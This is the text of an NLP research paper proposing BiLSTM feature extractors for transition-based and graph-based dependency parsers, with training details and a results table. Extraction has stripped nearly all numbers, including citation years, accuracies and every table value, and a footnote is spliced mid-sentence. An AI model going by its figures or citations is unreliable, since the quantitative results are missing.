regardless of the details of the parsing framework being used, a crucial step in parser design is choosing the right feature function for the underlying statistical model. recent work (see section . for an overview) attempts to alleviate parts of the feature function design problem by moving from linear to non-linear models, enabling the modeler to focus on a small set of "core" features and leaving it up to the machine-learning machinery to come up with good feature combinations (chen and manning, ; pei et al., ; lei et al., ; taub-tabib et al., ). however, the need to carefully define a set of core features remains.
for example, the work of chen and manning ( ) uses different elements in its feature function, while the work of pei et al. ( ) uses different elements. other works, notably dyer et al. ( ) and le and zuidema ( ), propose more sophisticated feature representations, in which the feature engineering is replaced with architecture engineering.

in this work, we suggest an approach which is much simpler in terms of both feature engineering and architecture engineering. our proposal (section ) is centered around birnns (irsoy and cardie, ; schuster and paliwal, ), and more specifically bilstms (graves, ), which are strong and trainable sequence models (see section . ). the bilstm excels at representing elements in a sequence (i.e., words) together with their contexts, capturing the element and an "infinite" window around it. we represent each word by its bilstm encoding, and use a concatenation of a minimal set of such bilstm encodings as our feature function, which is then passed to a non-linear scoring function (multi-layer perceptron). crucially, the bilstm is trained with the rest of the parser in order to learn a good feature representation for the parsing problem. if we set aside the inherent complexity of the bilstm itself and treat it as a black box, our proposal results in a pleasingly simple feature extractor.

we demonstrate the effectiveness of the approach by using the bilstm feature extractor in two parsing architectures, transition-based (section ) as well as graph-based (section ). in the graph-based parser, we jointly train a structured-prediction model on top of a bilstm, propagating errors from the structured objective all the way back to the bilstm feature-encoder. to the best of our knowledge, we are the first to perform such end-to-end training of a structured prediction model and a recurrent feature extractor for non-sequential outputs. (structured training of sequence tagging models over rnn-based representations was explored by chiu and nichols ( ) and lample et al. ( ).)

aside from the novelty of the bilstm feature extractor and the end-to-end structured training, we rely on existing models and techniques from the parsing and structured prediction literature. we stick to the simplest parsers in each category – greedy inference for the transition-based architecture, and a first-order, arc-factored model for the graph-based architecture. despite the simplicity of the parsing architectures and the feature functions, we achieve near state-of-the-art parsing accuracies in both english ( . uas) and chinese ( . uas), using a first-order parser with two features and while training solely on treebank data, without relying on semi-supervised signals such as pre-trained word embeddings (chen and manning, ), word-clusters (koo et al., ), or techniques such as tri-training (weiss et al., ). when also including pre-trained word embeddings, we obtain further improvements, with accuracies of . uas (english) and . uas (chinese) for a greedy transition-based parser with features, and . uas (en) / . (ch) for a greedy transition-based parser with features.

background and notation
notation we use x1:n to denote a sequence of n vectors x1, · · · , xn. fθ(·) is a function parameterized with parameters θ.
we write fl(·) as shorthand for fθl – an instantiation of f with a specific set of parameters θl. we use ◦ to denote a vector con- catenation operation, and v[i] to denote an indexing operation taking the ith element of a vector v. . feature functions in dependency parsing traditionally, state-of-the-art parsers rely on linear models over hand-crafted feature functions. the fea- ture functions look at core components (e.g. “word on top of stack”, “leftmost child of the second-to- top word on the stack”, “distance between the head and the modifier words”), and are comprised of sev- eral templates, where each template instantiates a bi- nary indicator function over a conjunction of core elements (resulting in features of the form “word on top of stack is x and leftmost child is y and . . . ”). the design of the feature function – which compo- nents to consider and which combinations of com- ponents to include – is a major challenge in parser design. once a good feature function is proposed in a paper it is usually adopted in later works, and sometimes tweaked to improve performance. ex- amples of good feature functions are the feature-set proposed by zhang and nivre ( ) for transition- based parsing (including roughly core compo- nents and feature templates), and the feature- set proposed by mcdonald et al. ( ) for graph- based parsing, with the paper listing templates for a first-order parser, while the first order feature- extractor in the actual implementation’s code (mst- parser ) includes roughly a hundred feature tem- plates. http://www.seas.upenn.edu/~strctlrn/ mstparser/mstparser.html http://www.seas.upenn.edu/~strctlrn/mstparser/mstparser.html http://www.seas.upenn.edu/~strctlrn/mstparser/mstparser.html the core features in a transition-based parser usu- ally look at information such as the word-identity and part-of-speech (pos) tags of a fixed number of words on top of the stack, a fixed number of words on the top of the buffer, the modifiers (usually left- most and right-most) of items on the stack and on the buffer, the number of modifiers of these elements, parents of words on the stack, and the length of the spans spanned by the words on the stack. the core features of a first-order graph-based parser usually take into account the word and pos of the head and modifier items, as well as pos-tags of the items around the head and modifier, pos tags of items be- tween the head and modifier, and the distance and direction between the head and modifier. . related research efforts coming up with a good feature-set for a parser is a hard and time consuming task, and many researchers attempt to reduce the required manual effort. the work of lei et al. ( ) suggests a low-rank ten- sor representation to automatically find good feature combinations. taub-tabib et al. ( ) suggest a kernel-based approach to implicitly consider all pos- sible feature combinations over sets of core-features. the recent popularity of neural networks prompted a move from templates of sparse, binary indicator features to dense core feature encodings fed into non-linear classifiers. chen and manning ( ) en- code each core feature of a greedy transition-based parser as a dense low-dimensional vector, and the vectors are then concatenated and fed into a non- linear classifier (multi-layer perceptron) which can potentially capture arbitrary feature combinations. weiss et al. 
( ) showed further gains using the same approach coupled with a somewhat improved set of core features, a more involved network archi- tecture with skip-layers, beam search-decoding, and careful hyper-parameter tuning. pei et al. ( ) apply a similar methodology to graph-based pars- ing. while the move to neural-network classi- fiers alleviates the need for hand-crafting feature- combinations, the need to carefully define a set of core features remain. for example, the feature rep- resentation in chen and manning ( ) is a con- catenation of word vectors, pos vectors and dependency-label vectors. the above works tackle the effort in hand-crafting effective feature combinations. a different line of work attacks the feature-engineering problem by suggesting novel neural-network architectures for encoding the parser state, including intermediately- built subtrees, as vectors which are then fed to non- linear classifiers. titov and henderson encode the parser state using incremental sigmoid-belief net- works ( ). in the work of dyer et al. ( ), the entire stack and buffer of a transition-based parser are encoded as a stack-lstms, where each stack el- ement is itself based on a compositional represen- tation of parse trees. le and zuidema ( ) en- code each tree node as two compositional represen- tations capturing the inside and outside structures around the node, and feed the representations into a reranker. a similar reranking approach, this time based on convolutional neural networks, is taken by zhu et al. ( ). finally, in kiperwasser and gold- berg ( ) we present an easy-first parser based on a novel hierarchical-lstm tree encoding. in contrast to these, the approach we present in this work results in much simpler feature functions, without resorting to elaborate network architectures or compositional tree representations. work by vinyals et al. ( ) employs a sequence-to-sequence with attention architecture for constituency parsing. each token in the input sen- tence is encoded in a deep-bilstm representation, and then the tokens are fed as input to a deep- lstm that predicts a sequence of bracketing ac- tions based on the already predicted bracketing as well as the encoded bilstm vectors. a trainable attention mechanism is used to guide the parser to relevant bilstm vectors at each stage. this ar- chitecture shares with ours the use of bilstm en- coding and end-to-end training. the sequence of bracketing actions can be interpreted as a sequence of shift and reduce operations of a transition-based parser. however, while the parser of vinyals et al. in all of these neural-network based approaches, the vec- tor representations of words were initialized using pre-trained word-embeddings derived from a large corpus external to the training data. this puts the approaches in the semi-supervised category, making it hard to tease apart the contribution of the au- tomatic feature-combination component from that of the semi- supervised component. relies on a trainable attention mechanism for fo- cusing on specific bilstm vectors, parsers in the transition-based family we use in section use a hu- man designed stack and buffer mechanism to manu- ally direct the parser’s attention. while the effec- tiveness of the trainable attention approach is im- pressive, the stack-and-buffer guidance of transition- based parsers results in more robust learning. 
in- deed, work by cross and huang ( ), published while working on the camera-ready version of this paper, show that the same methodology as ours is highly effective also for greedy, transition-based constituency parsing, surpassing the beam-based ar- chitecture of vinyals et al. ( . f vs. . f points) when trained on the penn treebank dataset and with- out using orthogonal methods such as ensembling and up-training. . bidirectional recurrent neural networks recurrent neural networks (rnns) are statistical learners for modeling sequential data. an rnn al- lows one to model the ith element in the sequence based on the past – the elements x :i up to and in- cluding it. the rnn model provides a framework for conditioning on the entire history x :i without resorting to the markov assumption which is tradi- tionally used for modeling sequences. rnns were shown to be capable of learning to count, as well as to model line lengths and complex phenomena such as bracketing and code indentation (karpathy et al., ). our proposed feature extractors are based on a bidirectional recurrent neural network (birnn), an extension of rnns that take into account both the past x :i and the future xi:n. we use a specific flavor of rnn called a long short-term memory network (lstm). for brevity, we treat rnn as an abstrac- tion, without getting into the mathematical details of the implementation of the rnns and lstms. for further details on rnns and lstms, the reader is referred to goldberg ( ) and cho ( ). the recurrent neural network (rnn) abstraction is a parameterized function rnnθ(x :n) mapping a sequence of n input vectors x :n, xi ∈ rdin to a se- quence of n output vectors h :n,hi ∈ rdout . each output vector hi is conditioned on all the input vec- tors x :i, and can be thought of as a summary of the prefix x :i of x :n. in our notation, we ignore the intermediate vectors h :n− and take the output of rnnθ(x :n) to be the vector hn. a bidirectional rnn is composed of two rnns, rnnf and rnnr, one reading the sequence in its regular order, and the other reading it in reverse. concretely, given a sequence of vectors x :n and a desired index i, the function birnnθ(x :n, i) is de- fined as: birnnθ(x :n, i) = rnnf (x :i)◦ rnnr(xn:i) the vector vi = birnn(x :n, i) is then a represen- tation of the ith item in x :n, taking into account both the entire history x :i and the entire future xi:n by concatenating the matching rnns. we can view the birnn encoding of an item i as representing the item i together with a context of an infinite window around it. computational complexity computing the birnn vectors encoding of the ith element of a sequence x :n requires o(n) time for computing the two rnns and concatenating their outputs. a naive approach of computing the bidirectional representation of all n elements result in o(n ) computation. however, it is trivial to compute the birnn encoding of all sequence items in linear time by pre-computing rnnf (x :n) and rnnr(xn: ), keeping the intermediate representa- tions, and concatenating the required elements as needed. birnn training initially, the birnn encodings vi do not capture any particular information. during training, the encoded vectors vi are fed into further network layers, until at some point a prediction is made, and a loss is incurred. 
the back-propagation algorithm is used to compute the gradients of all the parameters in the network (including the birnn pa- rameters) with respect to the loss, and an optimizer is used to update the parameters according to the gradients. the training procedure causes the birnn function to extract from the input sequence x :n the relevant information for the task task at hand. going deeper we use a variant of deep bidirectional rnn (or k-layer birnn) which is composed of k birnn functions birnn , · · · , birnnk that feed into each other: the output birnn`(x :n, ), . . . , birnn`(x :n,n) of birnn` becomes the input of birnn`+ . stacking birnns in this way has been empirically shown to be effective (irsoy and cardie, ). in this work, we use birnns and deep-birnns interchangeably, specifying the number of layers when needed. historical notes rnns were introduced by el- man ( ), and extended to birnns by schus- ter and paliwal ( ). the lstm variant of rnns is due to hochreiter and schmidhuber ( ). bilstms were recently popularized by graves ( ), and deep birnns were introduced to nlp by irsoy and cardie ( ), who used them for se- quence tagging. in the context of parsing, lewis et al. ( ) and vaswani et al. ( ) use a bilstm sequence tagging model to assign a ccg supertag for each token in the sentence. lewis et al. ( ) feeds the resulting supertags sequence into an a* ccg parser. vaswani et al. ( ) adds an addi- tional layer of lstm which receives the bilstm representation together with the k-best supertags for each word and outputs the most likely supertag given previous tags, and then feeds the predicted su- pertags to a discriminitively trained parser. in both works, the bilstm is trained to produce accurate ccg supertags, and is not aware of the global pars- ing objective. our approach we propose to replace the hand-crafted feature func- tions in favor of minimally-defined feature functions which make use of automatically learned bidirec- tional lstm representations. given n-words input sentence s with words w , . . . ,wn together with the corresponding pos tags t , . . . , tn, we associate each word wi and pos ti with embedding vectors e(wi) and e(ti), and cre- ate a sequence of input vectors x :n in which each xi is a concatenation of the corresponding word and pos vectors: xi = e(wi)◦e(pi) the embeddings are trained together with the model. this encodes each word in isolation, disregarding its context. we introduce context by representing each in this work the tag sequence is assumed to be given, and in practice is predicted by an external model. future work will address relaxing this assumption. input element as its (deep) bilstm vector, vi: vi = bilstm(x :n, i) our feature function φ is then a concatenation of a small number of bilstm vectors. the exact fea- ture function is parser dependent and will be dis- cussed when discussing the corresponding parsers. the resulting feature vectors are then scored using a non-linear function, namely a multi-layer perceptron with one hidden layer (mlp): mlpθ(x) = w · tanh(w ·x + b ) + b where θ = {w ,w ,b ,b } are the model parame- ters. beside using the bilstm-based feature func- tions, we make use of standard parsing techniques. crucially, the bilstm is trained jointly with the rest of the parsing objective. this allows it to learn rep- resentations which are suitable for the parsing task. consider a concatenation of two bilstm vectors (vi ◦vj) scored using an mlp. 
the scoring function has access to the words and pos-tags of vi and vj, as well as the words and pos-tags of the words in an infinite window surrounding them. as lstms are known to capture length and sequence position information, it is very plausible that the scoring function can be sensitive also to the distance between i and j, their ordering, and the sequential material between them.

parsing-time complexity once the bilstm is trained, parsing is performed by first computing the bilstm encoding vi for each word in the sentence (a linear time operation). then, parsing proceeds as usual, where the feature extraction involves a concatenation of a small number of the pre-computed vi vectors. (while the bilstm computation is quite efficient as it is, as demonstrated by lewis et al. ( ), a gpu implementation can perform the bilstm encoding over many sentences in parallel, making its computation cost almost negligible.)

transition-based parser
we begin by integrating the feature extractor in a transition-based parser (nivre, ). we follow the notation in goldberg and nivre ( ).

figure : illustration of the neural model scheme of the transition-based parser when calculating the scores of the possible transitions in a given configuration. the configuration (stack and buffer) is depicted on the top. each transition is scored using an mlp that is fed the bilstm encodings of the first word in the buffer and the three words at the top of the stack (the colors of the words correspond to colors of the mlp inputs above), and a transition is picked greedily. each xi is a concatenation of a word and a pos vector, and possibly an additional external embedding vector for the word. the figure depicts a single-layer bilstm, while in practice we use two layers. when parsing a sentence, we iteratively compute scores for all possible transitions and apply the best scoring action until the final configuration is reached.

the transition-based parsing framework assumes a transition system, an abstract machine that processes sentences and produces parse trees. the transition system has a set of configurations and a set of transitions which are applied to configurations. when parsing a sentence, the system is initialized to an initial configuration based on the input sentence, and transitions are repeatedly applied to this configuration. after a finite number of transitions, the system arrives at a terminal configuration, and a parse tree is read off the terminal configuration. in a greedy parser, a classifier is used to choose the transition to take in each configuration, based on features extracted from the configuration itself. the parsing algorithm is presented in algorithm below.

algorithm : greedy transition-based parsing
1: input: sentence s = w1, . . . , wn, t1, . . . , tn, parameterized function scoreθ(·) with parameters θ.
2: c ← initial(s)
3: while not terminal(c) do
4:   t̂ ← arg max_{t∈legal(c)} scoreθ( φ(c), t )
5:   c ← t̂(c)
6: return tree(c)

given a sentence s, the parser is initialized with the configuration c (line 2). then, a feature function φ(c) represents the configuration c as a vector, which is fed to a scoring function score assigning scores to (configuration, transition) pairs. score scores the possible transitions t, and the highest scoring transition t̂ is chosen (line 4). the transition t̂ is applied to the configuration, resulting in a new parser configuration. the process ends when reaching a final configuration, from which the resulting parse tree is read and returned (line 6).

transition systems differ by the way they define configurations, and by the particular set of transitions available to them. a parser is determined by the choice of a transition system, a feature function φ and a scoring function score. our choices are detailed below.

the arc-hybrid system many transition systems exist in the literature. in this work, we use the arc-hybrid transition system (kuhlmann et al., ), which is similar to the more popular arc-standard system (nivre, ), but for which an efficient dynamic oracle is available (goldberg and nivre, ; goldberg and nivre, ). in the arc-hybrid system, a configuration c = (σ, β, t) consists of a stack σ, a buffer β, and a set t of dependency arcs. both the stack and the buffer hold integer indices pointing to sentence elements. given a sentence s = w1, . . . , wn, t1, . . . , tn, the system is initialized with an empty stack, an empty arc set, and β = 1, . . . , n, root, where root is the special root index. any configuration c with an empty stack and a buffer containing only root is terminal, and the parse tree is given by the arc set tc of c. the arc-hybrid system allows 3 possible transitions, shift, left` and right`, defined as:

shift[(σ, b0|β, t)] = (σ|b0, β, t)
left`[(σ|s1|s0, b0|β, t)] = (σ|s1, b0|β, t ∪ {(b0, s0, `)})
right`[(σ|s1|s0, β, t)] = (σ|s1, β, t ∪ {(s1, s0, `)})

the shift transition moves the first item of the buffer (b0) to the stack. the left` transition removes the first item on top of the stack (s0) and attaches it as a modifier to b0 with label `, adding the arc (b0, s0, `). the right` transition removes s0 from the stack and attaches it as a modifier to the next item on the stack (s1), adding the arc (s1, s0, `).

scoring function traditionally, the scoring function scoreθ(x, t) is a discriminative linear model of the form scorew(x, t) = (w · x)[t]. the linearity of score required the feature function φ(·) to encode non-linearities in the form of combination features. we follow chen and manning ( ) and replace the linear scoring model with an mlp:

scoreθ(x, t) = mlpθ(x)[t]

simple feature function the feature function φ(c) is typically complex (see section . ). our feature function is the concatenated bilstm vectors of the top 3 items on the stack and the first item on the buffer. i.e., for a configuration c = (. . . |s2|s1|s0, b0| . . . , t) the feature extractor is defined as:

φ(c) = vs2 ◦ vs1 ◦ vs0 ◦ vb0
vi = bilstm(x1:n, i)

this feature function is rather minimal: it takes into account the bilstm representations of s1, s0 and b0, which are the items affected by the possible transitions being scored, as well as one extra stack context s2. figure depicts transition scoring with our architecture and this feature function. note that, unlike previous work, this feature function does not take into account t, the already built structure.
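to make the featurization concrete, the configuration scoring described above can be sketched as follows. this is an illustration in pytorch rather than the authors' pycnn implementation, and the dimensions, layer sizes and transition inventory are assumed:

import torch
import torch.nn as nn

class TransitionScorer(nn.Module):
    # sketch: encode the sentence once with a bilstm, then score transitions
    # from the concatenated vectors of s2, s1, s0 and b0
    def __init__(self, n_words, n_tags, wdim=100, tdim=25, hdim=125,
                 mlp_hidden=100, n_transitions=3):
        super().__init__()
        self.wemb = nn.Embedding(n_words, wdim)
        self.temb = nn.Embedding(n_tags, tdim)
        self.bilstm = nn.LSTM(wdim + tdim, hdim, num_layers=2,
                              bidirectional=True, batch_first=True)
        self.mlp = nn.Sequential(nn.Linear(8 * hdim, mlp_hidden), nn.Tanh(),
                                 nn.Linear(mlp_hidden, n_transitions))

    def encode(self, word_ids, tag_ids):
        x = torch.cat([self.wemb(word_ids), self.temb(tag_ids)], dim=-1)
        v, _ = self.bilstm(x.unsqueeze(0))     # (1, n, 2 * hdim)
        return v.squeeze(0)                    # v[i] is the bilstm vector of token i

    def score(self, v, s2, s1, s0, b0):
        phi = torch.cat([v[s2], v[s1], v[s0], v[b0]])   # phi(c)
        return self.mlp(phi)                            # one score per transition

the indices s2, s1, s0 and b0 are the sentence positions currently held by the stack and buffer; a padding or root index would be needed for configurations with fewer items, and is omitted here.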
the high parsing accuracies in the experimental sections suggest that the bilstm encoding is capable of estimating a lot of the missing information based on the provided stack and buffer elements and the sequential content between them. while not explored in this work, relying on only four word indices for scoring an action results in very compact state signatures, making our proposed feature representation very appealing for use in transition-based parsers that employ dynamic-programming search (huang and sagae, ; kuhlmann et al., ).

extended feature function one of the benefits of the greedy transition-based parsing framework is precisely its ability to look at arbitrary features from the already built tree. if we allow a somewhat less minimal feature function, we could add the bilstm vectors corresponding to the right-most and left-most modifiers of s0, s1 and s2, as well as the left-most modifier of b0, reaching a total of bilstm vectors. we refer to this as the extended feature set. as we'll see in section , using the extended set does indeed improve parsing accuracies when using pre-trained word embeddings, but has a minimal effect in the fully-supervised case. (an additional buffer context is not needed, as b1 is by definition adjacent to b0, a fact that we expect the bilstm encoding of b0 to capture; in contrast, b0, s0, s1 and s2 are not necessarily adjacent to each other in the original sentence. we did not experiment with other feature configurations; it is well possible that not all of the additional child encodings are needed for the observed accuracy gains, and that a smaller feature set would yield similar or even better improvements.)

. details of the training algorithm
the training objective is to set the score of correct transitions above the scores of incorrect transitions. we use a margin-based objective, aiming to maximize the margin between the highest scoring correct action and the highest scoring incorrect action. the hinge loss at each parsing configuration c is defined as:

max( 0 , 1 − max_{to∈g} mlp( φ(c) )[to] + max_{tp∈a\g} mlp( φ(c) )[tp] )

where a is the set of possible transitions and g is the set of correct (gold) transitions at the current stage. at each stage of the training process the parser scores the possible transitions a, incurs a loss, selects a transition to follow, and moves to the next configuration based on it. the local losses are summed throughout the parsing process of a sentence, and the parameters are updated with respect to the sum of the losses at sentence boundaries. (to increase gradient stability and training speed, we simulate mini-batch updates by only updating the parameters when the sum of local losses contains at least non-zero elements; sums of fewer elements are carried across sentences. this assures us a sufficient number of gradient samples for every update, thus minimizing the effect of gradient instability.) the gradients of the entire network (including the mlp and the bilstm) with respect to the sum of the losses are calculated using the backpropagation algorithm. as usual, we perform several training iterations over the training corpus, shuffling the order of sentences in each iteration.

error-exploration and dynamic oracle training we follow goldberg and nivre ( ); goldberg and nivre ( ) in using error exploration training with a dynamic-oracle, which we briefly describe below. at each stage in the training process, the parser assigns scores to all the possible transitions t ∈ a. it then selects a transition, applies it, and moves to the next step. which transition should be followed? a common approach follows the highest scoring transition that can lead to the gold tree.
however, when training in this way the parser sees only configurations that result from following correct actions, and as a result tends to suffer from error propagation at test time. instead, in error-exploration training the parser follows the highest scoring action in a during training even if this action is incorrect, exposing it to configurations that result from erroneous decisions. this strategy requires defining the set g such that the correct actions to take are well-defined also for states that cannot lead to the gold tree. such a set g is called a dynamic oracle. we perform error-exploration training using the dynamic-oracle defined by goldberg and nivre ( ).

aggressive exploration we found that even when using error-exploration, after one iteration the model remembers the training set quite well, and does not make enough errors to make error-exploration effective. in order to expose the parser to more errors, we follow an aggressive-exploration scheme: we sometimes follow incorrect transitions also if they score below correct transitions. specifically, when the score of the correct transition is greater than that of the wrong transition but the difference is smaller than a margin constant, we choose to follow the incorrect action with probability pagg (we use pagg = . in our experiments).

summary the greedy transition-based parser follows standard techniques from the literature (margin-based objective, dynamic oracle training, error exploration, mlp-based non-linear scoring function). we depart from the literature by replacing the hand-crafted feature function over carefully selected components of the configuration with a concatenation of bilstm representations of a few prominent items on the stack and the buffer, and training the bilstm encoder jointly with the rest of the network.

graph-based parser
graph-based parsing follows the common structured prediction paradigm (taskar et al., ; mcdonald et al., ):

predict(s) = arg max_{y∈y(s)} score_global(s, y)
score_global(s, y) = Σ_{part∈y} score_local(s, part)

given an input sentence s (and the corresponding sequence of vectors x1:n), we look for the highest-scoring parse tree y in the space y(s) of valid dependency trees over s.

figure : illustration of the neural model scheme of the graph-based parser when calculating the score of a given parse tree. the parse tree is depicted below the sentence. each dependency arc in the sentence is scored using an mlp that is fed the bilstm encoding of the words at the arc's end points (the colors of the arcs correspond to colors of the mlp inputs above), and the individual arc scores are summed to produce the final score. all the mlps share the same parameters. the figure depicts a single-layer bilstm, while in practice we use two layers. when parsing a sentence, we compute scores for all possible n² arcs, and find the best scoring tree using a dynamic-programming algorithm.
in order to make the search tractable, the scoring function is decomposed into the sum of local scores for each part independently. in this work, we focus on the arc-factored graph-based approach presented in mcdonald et al. ( ). arc-factored parsing decomposes the score of a tree into the sum of the scores of its head-modifier arcs (h, m):

parse(s) = arg max_{y∈y(s)} Σ_{(h,m)∈y} score( φ(s, h, m) )

given the scores of the arcs, the highest scoring projective tree can be efficiently found using eisner's decoding algorithm ( ). mcdonald et al. and most subsequent work estimate the local score of an arc by a linear model parameterized by a weight vector w, and a feature function φ(s, h, m) assigning a sparse feature vector for an arc linking modifier m to head h. we follow pei et al. ( ) and replace the linear scoring function with an mlp.

the feature extractor φ(s, h, m) is usually complex, involving many elements (see section . ). in contrast, our feature extractor uses merely the bilstm encoding of the head word and the modifier word:

φ(s, h, m) = birnn(x1:n, h) ◦ birnn(x1:n, m)

the final model is:

parse(s) = arg max_{y∈y(s)} score_global(s, y)
         = arg max_{y∈y(s)} Σ_{(h,m)∈y} score( φ(s, h, m) )
         = arg max_{y∈y(s)} Σ_{(h,m)∈y} mlp( vh ◦ vm )
vi = birnn(x1:n, i)

the architecture is illustrated in figure .

training the training objective is to set the score function such that the correct tree y is scored above incorrect ones. we use a margin-based objective (mcdonald et al., ; lecun et al., ), aiming to maximize the margin between the score of the gold tree y and the highest scoring incorrect tree y′. we define a hinge loss with respect to a gold tree y as:

max( 0 , 1 − Σ_{(h,m)∈y} mlp( vh ◦ vm ) + max_{y′≠y} Σ_{(h,m)∈y′} mlp( vh ◦ vm ) )

each of the tree scores is then calculated by activating the mlp on the arc representations. the entire loss can be viewed as the sum of multiple neural networks, which is sub-differentiable. we calculate the gradients of the entire network (including the bilstm encoder and word embeddings).

labeled parsing up to now, we described unlabeled parsing. a possible approach for adding labels is to score the combination of an unlabeled arc (h, m) and its label ` by considering the label as part of the arc (h, m, `). this results in |labels| × |arcs| parts that need to be scored, leading to slow parsing speeds and arguably a harder learning problem. instead, we chose to first predict the unlabeled structure using the model given above, and then predict the label of each resulting arc. using this approach, the number of parts stays small, enabling fast parsing. the labeling of an arc (h, m) is performed using the same feature representation φ(s, h, m) fed into a different mlp predictor:

label(h, m) = arg max_{`∈labels} mlp_lbl( vh ◦ vm )[`]

as before we use a margin-based hinge loss. the labeler is trained on the gold trees. (when training the labeled parser, we calculate the structure loss and the labeling loss for each training sentence, and sum the losses prior to computing the gradients.) the bilstm encoder responsible for producing vh and vm is shared with the arc-factored parser: the same bilstm encoder is used in the parser and the labeler. this sharing of parameters can be seen as an instance of multi-task learning (caruana, ). as we show in section , the sharing is effective: training the bilstm feature encoder to be good at predicting arc-labels significantly improves the parser's unlabeled accuracy.
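the two-stage scheme just described can be sketched as follows. as with the earlier sketch, this is an illustration in pytorch rather than the authors' pycnn code, and the dimensions and label-set size are assumed; v is a matrix of pre-computed bilstm vectors (one row per token):

import torch
import torch.nn as nn

class ArcScorer(nn.Module):
    # score every (head, modifier) pair and label chosen arcs,
    # sharing one set of bilstm encodings v (shape: n x d)
    def __init__(self, d, hidden=100, n_labels=40):
        super().__init__()
        self.arc_mlp = nn.Sequential(nn.Linear(2 * d, hidden), nn.Tanh(),
                                     nn.Linear(hidden, 1))
        self.lbl_mlp = nn.Sequential(nn.Linear(2 * d, hidden), nn.Tanh(),
                                     nn.Linear(hidden, n_labels))

    def arc_scores(self, v):
        n, d = v.shape
        heads = v.unsqueeze(1).expand(n, n, d)    # row h repeated over modifiers
        mods = v.unsqueeze(0).expand(n, n, d)     # row m repeated over heads
        pairs = torch.cat([heads, mods], dim=-1)  # phi(s, h, m) = v_h o v_m
        return self.arc_mlp(pairs).squeeze(-1)    # (n, n) score matrix

    def label(self, v, h, m):
        return self.lbl_mlp(torch.cat([v[h], v[m]])).argmax().item()

decoding the best projective tree from the (n, n) score matrix would be done with eisner's algorithm, which is not shown here; the label predictor is applied only to the arcs of the decoded tree.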
loss augmented inference
in initial experiments, the network learned quickly and overfit the data. in order to remedy this, we found it useful to use loss-augmented inference (taskar et al., ). the intuition behind loss-augmented inference is to update against trees which have high model scores and are also very wrong. this is done by augmenting the score of each part not belonging to the gold tree by adding a constant to its score. formally, the loss is transformed as follows:

max(0, 1 − score(x,y) + max_{y′ ≠ y} ∑_{part ∈ y′} (score_local(x,part) + 1[part ∉ y]))

speed improvements
the arc-factored model requires the scoring of n² arcs. scoring is performed using an mlp with one hidden layer, resulting in n² matrix-vector multiplications from the input to the hidden layer, and n² multiplications from the hidden to the output layer. the first n² multiplications involve larger-dimensional input and output vectors, and are the most time consuming. fortunately, these can be reduced to 2n multiplications and n² vector additions, by observing that the multiplication w·(v_h ◦ v_m) can be written as w¹·v_h + w²·v_m, where w¹ and w² are the first and second half of the matrix w, and reusing the products across different pairs.
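the factorization above can be checked directly. the following small numpy sketch (illustrative only, with made-up dimensions) precomputes the two halves of the first-layer product once per word and reuses them for every arc, producing the same result as the naive per-arc computation.

```python
# numpy sketch (illustrative dimensions) of the speed-up:
# w · (v_h ∘ v_m) = w1 · v_h + w2 · v_m, so the per-word products can be
# computed once (2n multiplications) and reused for all n^2 arcs.
import numpy as np

n, d, hid = 8, 50, 20                 # sentence length, bilstm dim, hidden dim (assumed)
v = np.random.randn(n, d)             # bilstm encodings v_1 .. v_n
w = np.random.randn(hid, 2 * d)       # first mlp layer
w1, w2 = w[:, :d], w[:, d:]           # first and second half of w

# naive: one large matrix-vector product per candidate arc (n^2 of them)
naive = np.array([[w @ np.concatenate([v[h], v[m]]) for m in range(n)]
                  for h in range(n)])

# factored: n products per half, then a cheap vector addition per arc
head_part = v @ w1.T                  # row h holds w1 · v_h
mod_part = v @ w2.T                   # row m holds w2 · v_m
factored = head_part[:, None, :] + mod_part[None, :, :]

assert np.allclose(naive, factored)
```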
summary
the graph-based parser is a straightforward first-order parser, trained with a margin-based hinge loss and loss-augmented inference. we depart from the literature by replacing the hand-crafted feature function with a concatenation of bilstm representations of the head and modifier words, and by training the bilstm encoder jointly with the structured objective. we also introduce a novel multi-task learning approach for labeled parsing, by training a second-stage arc-labeler sharing the same bilstm encoder with the unlabeled parser.

experiments and results
we evaluated our parsing model on english and chinese data. for comparison purposes we follow the setup of dyer et al. ( ).

data
for english, we used the stanford dependency (sd) (de marneffe and manning, ) conversion of the penn treebank (marcus et al., ), using the standard train/dev/test splits with the same predicted pos-tags as used in dyer et al. ( ) and chen and manning ( ). this dataset contains a few non-projective trees. punctuation symbols are excluded from the evaluation.

for chinese, we use the penn chinese treebank . (ctb ), using the train/test/dev splits of (zhang and clark, ; dyer et al., ) with gold part-of-speech tags, also following (dyer et al., ; chen and manning, ). when using external word embeddings, we also use the same data as dyer et al. ( ). we thank dyer et al. for sharing their data with us.

system | method | representation | emb | ptb-ym uas | ptb-sd uas | ptb-sd las | ctb uas | ctb las
this work | graph, 1st order | bilstm vectors | – | – | . | . | . | .
this work | transition (greedy, dyn-oracle) | bilstm vectors | – | – | . | . | . | .
this work | transition (greedy, dyn-oracle) | bilstm vectors | – | – | . | . | . | .
zhangnivre | transition (beam) | large feature set (sparse) | – | . | – | – | . | .
martins (turboparser) | graph, 3rd order+ | large feature set (sparse) | – | . | . | – | – | –
pei | graph, 2nd order | large feature set (dense) | – | . | – | – | – | –
dyer | transition (greedy) | stack-lstm + composition | – | – | . | . | . | .
ballesteros | transition (greedy, dyn-oracle) | stack-lstm + composition | – | – | . | . | . | .
this work | graph, 1st order | bilstm vectors | yes | – | . | . | . | .
this work | transition (greedy, dyn-oracle) | bilstm vectors | yes | – | . | . | . | .
this work | transition (greedy, dyn-oracle) | bilstm vectors | yes | – | . | . | . | .
weiss | transition (greedy) | large feature set (dense) | yes | – | . | . | – | –
weiss | transition (beam) | large feature set (dense) | yes | – | . | . | – | –
pei | graph, 2nd order | large feature set (dense) | yes | . | – | – | – | –
dyer | transition (greedy) | stack-lstm + composition | yes | – | . | . | . | .
ballesteros | transition (greedy, dyn-oracle) | stack-lstm + composition | yes | – | . | . | . | .
lezuidema | reranking/blend | inside-outside recursive net | yes | . | . | . | – | –
zhu | reranking/blend | recursive conv-net | yes | . | – | – | . | –
